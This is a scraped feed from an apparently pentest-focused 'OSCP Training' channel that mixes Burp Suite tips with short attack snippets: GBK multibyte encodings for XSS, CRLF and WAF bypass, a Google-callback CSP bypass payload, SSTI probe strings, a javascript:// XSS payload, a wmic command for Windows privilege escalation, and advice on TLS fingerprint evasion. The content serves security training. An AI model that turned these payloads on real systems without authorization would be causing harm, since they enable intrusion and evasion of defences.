🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Burp Suite 2023.8+ includes a feature that theoretically makes opening untrusted project files safe. If you find a bypass, you're probably eligible for a bounty - check the full details here:

https://portswigger.net/burp/releases/professional-community-2023-8

Burp Suite Release Notes

Professional / Community 2023.8

This release introduces the ability to reuse HTTP/1 connections in Intruder, specify intermediate CA certificates when authenticating using hardware tokens and smart cards, safely open third-party pro

👍10

8.22K views15:04

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Periodical reminder: it's possible to navigate sub-tabs (like Repeater entries) from the keyboard.

You simply have to configure the actions "Go to previous tab" and "Go to next tab".

Burp Suite

7.72K viewsedited 13:55

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

As Burp Suite is developed in Java, regexes may use embedded flag expressions like "(?m)"

Here's a detailled description of all the possibilities (including embedded flags, character classes, quantifiers, groups, ...)

👍7❤2🎉1

7.57K views06:12

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Bug Bounty Tip

GBK Encoding / MultiByte Attack

嘊 = %E5%98%8A = \u560a ⇒ %0A
嘍 = %E5%98%8D = \u560d ⇒ %0D
嘾 = %E5%98%BE = \u563e ⇒ %3E (>)
嘼 = %E5%98%BC = \u563c ⇒ %3C (<)
嘢 = %E5%98%A2 = \u5622 ⇒ %22 (')
嘧 = %E5%98%A7 = \u5627 ⇒ %27 (")

For XSS, CRLF, WAF bypass

❤6👍3

8.74K views06:28

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

👍2

8.89K views06:30

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

👍15❤8👏2

8.71K views06:34

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

CSP Protection Bypass (using Google domain)

/o/oauth2/revoke?callback=alert(1);console.log

❤9🔥1

8.49K views19:25

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Useful for local privesc on Windows systems; find unquoted service path using the following:


wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

#OSCP #Windows

👍12

7.84K views17:42

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

https://portswigger.net/burp/documentation/desktop/settings/network/tls#tls-negotiation

Burp Suite 2023.10 is harder to fingerprint than earlier versions as it now sets 'Accept-Encoding: gzip, deflate, br'. If you're still blocked, you might bypass it by tinkering with your TLS ciphers using "Network->TLS -> Use custom protocols and ciphers"

portswigger.net

TLS settings - PortSwigger

The TLS settings enable you to configure: TLS negotiation. Client TLS certificates. Server TLS certificates. Java TLS settings. TLS negotiation These ...

👍3

9.18K views18:30

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Bug Bounty Tip

SSTI (Server Side Template Injection) Payload List

🔹{7*7}
🔹*{7*7}
🔹{{7*7}}
🔹[[7*7]]
🔹${7*7}
🔹@(7*7)
🔹<?=7*7?>
🔹<%= 7*7 %>
🔹${= 7*7}
🔹{{= 7*7}}
🔹${{7*7}}
🔹#{7*7}
🔹[=7*7]

If evaluated as 49 - the target is vulnerable

👍11

9.87K views18:36

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Bug Bounty Tip

When the app only accepts URLs
with a specific scheme, try
injecting javascript://test.com

Then, use these symbols
to craft an XSS payload
🔹%0a
🔹%0d
🔹%E2%80%A8
🔹%E2%80%A9

✅ javascript://test.com%0aalert(1)

👍13❤1

10.1K views19:36

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet

GitHub

GitHub - S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods…

A cheat sheet that contains common enumeration and attack methods for Windows Active Directory. - S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet

👍7

9.78K views16:54

About

Blog

Apps

Platform